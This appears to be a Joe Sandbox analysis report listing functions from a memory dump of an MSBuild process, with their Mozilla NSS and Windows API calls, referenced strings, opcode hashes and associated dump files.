Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 9c1252dd1fa8946e25902a26481dcd10f7197b451b88fd367f0e866d08ea50eb
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: A91163A5B002855BEB10AFAA6C51B6BB6ECDF5454AF044039E809D7741FB60D90886B3

Function 6CB78C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CB78C1B
EnterCriticalSection.KERNEL32 ref: 6CB78C34
PL_ArenaAllocate.NSS3 ref: 6CB78C65
PR_Unlock.NSS3 ref: 6CB78C9C
PR_Unlock.NSS3 ref: 6CB78CB6

Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4

Strings

KRAM, xrefs: 6CB78C8F

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: bd16690f82bd817724a04002b23597c8cb66be27494a83783dcdc4bca1a9c5b4
Instruction ID: 599ff3431bd030ef4e159d5dd6d3d7b4c6096d0d64216b9b727853cf3287ac6f
Opcode Fuzzy Hash: bd16690f82bd817724a04002b23597c8cb66be27494a83783dcdc4bca1a9c5b4
Instruction Fuzzy Hash: 0721AEB1A056418FD700AF78C484569BBF4FF05318F05896EDC98DB751EB36E889CBA2

Function 6CC0A540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6CC0A390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CC0A415

PK11_ExtractKeyValue.NSS3(00000000), ref: 6CC0A5AC
memcpy.VCRUNTIME140(?,?,?), ref: 6CC0A5BF
PK11_FreeSymKey.NSS3(00000000), ref: 6CC0A5C8

Part of subcall function 6CBAADC0: TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE10
Part of subcall function 6CBAADC0: EnterCriticalSection.KERNEL32(?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE24
Part of subcall function 6CBAADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CB8D079,00000000,00000001), ref: 6CBAAE5A
Part of subcall function 6CBAADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE6F
Part of subcall function 6CBAADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAE7F
Part of subcall function 6CBAADC0: TlsGetValue.KERNEL32(?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEB1
Part of subcall function 6CBAADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB8CDBB,?,6CB8D079,00000000,00000001), ref: 6CBAAEC9

PK11_FreeSymKey.NSS3(00000000), ref: 6CC0A5D9
PR_SetError.NSS3(FFFFD04C,00000000), ref: 6CC0A5E8

Strings

*@, xrefs: 6CC0A589

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
String ID: *@
API String ID: 2660593509-1483644743
Opcode ID: 91b2f963dd739d22db2bd855afbf5efbd959dd8256a1b483a986241ee091b5c2
Instruction ID: 93b80ab6200ab7734770b8b2dd8c71c216052eeaf03afe27f968abb2061bdce6
Opcode Fuzzy Hash: 91b2f963dd739d22db2bd855afbf5efbd959dd8256a1b483a986241ee091b5c2
Instruction Fuzzy Hash: F221D5B2D046149BC7009F699C0169FBBB4BFD971CF05422DEC9823740F775A6598BD2

Function 6CC72C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CC72CA0
PR_ExitMonitor.NSS3 ref: 6CC72CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CC72CD1
strdup.MOZGLUE(?), ref: 6CC72CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CC72D27

Strings

Loaded library %s (static lib), xrefs: 6CC72D22

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 61938f47d7cc4e3327e1989b6a89be5810561b312f95db451819ec3c3f98e4e7
Instruction ID: 88f890a5ef4b8ae4ef8b2b909a1348335422f39cf234c6bd2cd51bc6c438dd12
Opcode Fuzzy Hash: 61938f47d7cc4e3327e1989b6a89be5810561b312f95db451819ec3c3f98e4e7
Instruction Fuzzy Hash: 9711EFB1B01240DFEB208F1AD858A6A77B4EB5530DF14802ED809C7B41F731E919CBA1

Function 6CBC0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016

Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5

PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
TlsGetValue.KERNEL32(00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1044
free.MOZGLUE(00000000,?,00000800,6CB5EF74,00000000), ref: 6CBC1064

Strings

security, xrefs: 6CBC1025

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 429c641759ccab3e6336523495cde9d022e0b8220a3e6217239ce5f4cd44d69f
Instruction ID: 80c53493fd8ed9521311db15642957b5bdc6692041fc3f8bf3a74ad753a5d9d5
Opcode Fuzzy Hash: 429c641759ccab3e6336523495cde9d022e0b8220a3e6217239ce5f4cd44d69f
Instruction Fuzzy Hash: C1010431B402D09BE7202F3D9C05A5A7A7CFF42749F094116E808A6A52EB60D254DBE7

Function 6CBF0570 Relevance: 10.5, APIs: 7, Instructions: 47COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CBDC89B,FFFFFE80,?,6CBDC89B), ref: 6CBF058B
free.MOZGLUE(?,?,6CBDC89B), ref: 6CBF0592
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6CBDC89B), ref: 6CBF05AE
PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6CBDC89B), ref: 6CBF05C2
DeleteCriticalSection.KERNEL32(6CBDC89B,?,6CBDC89B), ref: 6CBF05D8
free.MOZGLUE(?,?,6CBDC89B), ref: 6CBF05DF
PR_SetError.NSS3(FFFFE09A,00000000,?,6CBDC89B), ref: 6CBF05FB

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Error$CriticalDeleteSectionfree$Value
String ID:
API String ID: 1757055810-0
Opcode ID: 9750fc8dfae87822c42b7cfaae8f04acf5e68d0740370a71402268145b43782c
Instruction ID: db360dfcb2e72be4cabba90a37f6e251afa7aa619910c287758e005963578949
Opcode Fuzzy Hash: 9750fc8dfae87822c42b7cfaae8f04acf5e68d0740370a71402268145b43782c
Instruction Fuzzy Hash: 5801FC71B051A45BEE21AFE4AC0D74D7B789B07319F400020E51656B50D7E5564D87AB

Function 6CC02E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC03046

Part of subcall function 6CBEEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBEEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CBD7FFB), ref: 6CC0312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC03154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CC02E8B

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

Part of subcall function 6CBEF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CBD9BFF,?,00000000,00000000), ref: 6CBEF134

memcpy.VCRUNTIME140(8B3C75C0,?,6CBD7FFA), ref: 6CC02EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CC0317B

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: aa56caafd138b428177a33e267d9379343be23e5fc7a616d97ded97f3c18b0d4
Instruction ID: e577bc598b60fba0994475709f84e54a1c1ea8fdd850adc63cd746b246461881
Opcode Fuzzy Hash: aa56caafd138b428177a33e267d9379343be23e5fc7a616d97ded97f3c18b0d4
Instruction Fuzzy Hash: D2A1BC75A002289FDB24CF54CC94BEAB7B5EF49308F048199ED49A7741E731AE85CFA1

Function 6CBCED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CBCED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CBCEDCE

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

free.MOZGLUE(00000000,?,?,?,?,6CBCB04F), ref: 6CBCEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CBCEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CBCEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CBCEEFB

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 0f938ec222f15612b2e51abc9e5495c476f51ea7b520403ce05ef9d00c992f92
Instruction ID: 4e97acd0e7e98df9e1759fe0a9063d71bca4bf6b5c8e0054d10308a33c96d48a
Opcode Fuzzy Hash: 0f938ec222f15612b2e51abc9e5495c476f51ea7b520403ce05ef9d00c992f92
Instruction Fuzzy Hash: 308159B5B00286DFEB14CF59D881AAE77B5EF88348F144428E8169B751DB30E915CBA3

Function 6CBCCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBCC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CBCDAE2,?), ref: 6CBCC6C2

PR_Now.NSS3 ref: 6CBCCD35

Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED

Part of subcall function 6CBB6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61C6F,00000000,00000004,?,?), ref: 6CBB6C3F

PR_GetCurrentThread.NSS3 ref: 6CBCCD54

Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07

Part of subcall function 6CBB7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB61CCC,00000000,00000000,?,?), ref: 6CBB729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBCCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CBCCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CBCCE2C

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CBCCE40

Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D

Part of subcall function 6CBCCEE0: PORT_ArenaMark_Util.NSS3(?,6CBCCD93,?), ref: 6CBCCEEE
Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBCCD93,?), ref: 6CBCCEFC
Part of subcall function 6CBCCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBCCD93,?), ref: 6CBCCF0B
Part of subcall function 6CBCCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBCCD93,?), ref: 6CBCCF1D

Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF47
Part of subcall function 6CBCCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF67
Part of subcall function 6CBCCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CBCCD93,?,?,?,?,?,?,?,?,?,?,?,6CBCCD93,?), ref: 6CBCCF78

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: c95717be3c62bf8725db98a088aba3d7f52238f618189eff14577157b57ae5fd
Instruction ID: 09d6f068c8cb9310cc545886c86fd267c8b122013262104e43462967272fd387
Opcode Fuzzy Hash: c95717be3c62bf8725db98a088aba3d7f52238f618189eff14577157b57ae5fd
Instruction Fuzzy Hash: 5B51B1B6B001429BEB10EF69DC40BAA77F4EF59348F250524D859A7B41EB31F905CB93

Function 6CB9EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CB9EF38

Part of subcall function 6CB89520: PK11_IsLoggedIn.NSS3(00000000,?,6CBB379E,?,00000001,?), ref: 6CB89542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CB9EF53

Part of subcall function 6CBA4C20: TlsGetValue.KERNEL32 ref: 6CBA4C4C
Part of subcall function 6CBA4C20: EnterCriticalSection.KERNEL32(?), ref: 6CBA4C60
Part of subcall function 6CBA4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CA1
Part of subcall function 6CBA4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CBE
Part of subcall function 6CBA4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4CD2
Part of subcall function 6CBA4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA4D3A

PR_GetCurrentThread.NSS3 ref: 6CB9EF9E

Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07

free.MOZGLUE(00000000), ref: 6CB9EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB9F016
free.MOZGLUE(00000000), ref: 6CB9F022

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 9ae0ffe673357673f31385d9125867feab8e182ec4db645ebdf30333598ea3ff
Instruction ID: 18a46ea96afd9534404ee0a75dd1836f938489fe52fe4ed8fc56cecbde2abccb
Opcode Fuzzy Hash: 9ae0ffe673357673f31385d9125867feab8e182ec4db645ebdf30333598ea3ff
Instruction Fuzzy Hash: 334192B1E0024AABDF018FA9DC45BEE7BB9EF49358F044035F915A6350E771C9158BA1

Function 6CB7E400 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB7E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB7E44F

Part of subcall function 6CB82C40: TlsGetValue.KERNEL32(6CB83F23,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C62
Part of subcall function 6CB82C40: EnterCriticalSection.KERNEL32(0000001C,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C76
Part of subcall function 6CB82C40: PL_HashTableLookup.NSS3(00000000,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C86
Part of subcall function 6CB82C40: PR_Unlock.NSS3(00000000,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB7E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB7E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB7E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB7E52F

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 0bd9234348a64066a8bd83ca6024b05d41c2116839817539021ae65f8ee35be4
Instruction ID: 74acf517cbc0be51ecaad9581cfb3120ee65e66d814a870f3c37acc6cddb6f70
Opcode Fuzzy Hash: 0bd9234348a64066a8bd83ca6024b05d41c2116839817539021ae65f8ee35be4
Instruction Fuzzy Hash: 0F4115B4A056958FCB10EFB8D5845AEBBF0FF05308F054969DCA49B711E730E994CBA2

Function 6CB765D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(-00000007), ref: 6CB7660F

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

free.MOZGLUE(00000000), ref: 6CB76660
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6CB7667B
SGN_DecodeDigestInfo.NSS3(?), ref: 6CB7669B
SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6CB766B0
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB766C8

Part of subcall function 6CBA25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6CB7662E,?,?), ref: 6CBA2670
Part of subcall function 6CBA25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6CB7662E,?), ref: 6CBA2684
Part of subcall function 6CBA25D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6CBA26C2
Part of subcall function 6CBA25D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6CBA26E0
Part of subcall function 6CBA25D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6CBA26F4
Part of subcall function 6CBA25D0: PR_Unlock.NSS3(?), ref: 6CBA274D

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
